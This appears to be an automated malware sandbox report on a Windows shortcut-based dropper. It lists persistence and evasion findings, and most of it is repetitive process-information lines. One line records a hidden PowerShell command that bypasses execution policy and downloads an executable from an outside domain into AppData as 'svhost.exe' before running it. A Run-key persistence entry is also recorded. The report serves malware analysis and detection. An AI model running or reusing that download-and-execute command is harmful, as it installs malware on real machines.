                    Source: initial sampleStatic PE information: section name: .text entropy: 7.998651527995621

                    Persistence and Installation Behavior

                    barindex
                    Windows shortcut file (LNK) starts blacklisted processes
                    Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Source: LNK fileProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    Source: LNK fileProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    Source: LNK fileProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    Source: LNK fileProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    Source: LNK fileProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    Source: LNK fileProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    Tries to download and execute files (via powershell)
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://oiartzunirratia.eus/install/clean/Lcovlccdxd.exe','C:\Users\user\AppData\Roaming\svhost.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhost.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\svhost.exeJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\svhost.exeFile created: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\svhost.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run OpgcxhsdwJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhost.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run OpgcxhsdwJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Uses known network protocols on non-standard ports
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 7053
                    Source: unknownNetwork traffic detected: HTTP traffic on port 7053 -> 49697
                    Source: unknownNetwork traffic detected: HTTP traffic on port 7053 -> 49697
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 7053
                    Source: unknownNetwork traffic detected: HTTP traffic on port 7053 -> 49697
                    Source: unknownNetwork traffic detected: HTTP traffic on port 7053 -> 49697
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 7053
                    Source: unknownNetwork traffic detected: HTTP traffic on port 7053 -> 49697
                    Source: unknownNetwork traffic detected: HTTP traffic on port 7053 -> 49697
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 7053
                    Source: unknownNetwork traffic detected: HTTP traffic on port 7053 -> 49697
                    Source: unknownNetwork traffic detected: HTTP traffic on port 7053 -> 49697
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Hribpuz\Opgcxhsdw.exeProcess information set: NOOPENFILEERRORBOX
